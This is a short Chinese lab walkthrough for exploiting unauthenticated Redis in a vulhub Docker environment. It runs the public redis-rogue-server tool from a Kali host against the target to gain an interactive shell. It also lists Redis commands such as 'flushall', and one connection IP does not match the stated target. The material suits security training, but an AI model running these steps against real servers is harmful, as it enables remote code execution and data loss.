Redis未授权访问漏洞
靶场IP:192.168.30.138
kali的IP:192.168.30.129
搭建靶场环境
进入目录:cd/vulhub-master/redis/4-unacc
启动:docker-compose up-d
检查:docker-compose ps
vi docker-compose.yml //查看端口和版本号
开启成功
安装redis工具
在kali上安装redis进行服务链接
#安装redis
apt-get install redis
#redis使用
redis-cli -h 192.168.30.137 -p 6379
#redis常见命令
(1)查看信息:info
(2)删除所有数据库内容:flushall
(3)刷新数据库:flushdb(3)
(4)看所有键:KEYS *,使用select num可以查看键值数据:
(5)设置变量:set test"whoami"
(6)config set dir dirpath 设置路径等配置
(7)config get dir/dbfilename 获取路径及数据配置信息
(8)save保存
(9)get 变量,查看变量名称
步骤三:可以直接连接执行命令且不需要认证说明存在未授权访问漏洞----->下载以下攻击项目…
https://github.com/n0b0dyCN/redis-rogue-server
可以下载git源码或者压缩包
git clone https://github.com/n0b0dyCN/redis-rogue-server.git
步骤四:使用工具执行以下命令获取目标的命令执行环境,交互时输入i键会获取Shell环境
python3 redis-rogue-server.py --rhost 192.168.30.138 --lhost 192.168.30.129
然后就可以输入命令获取信息了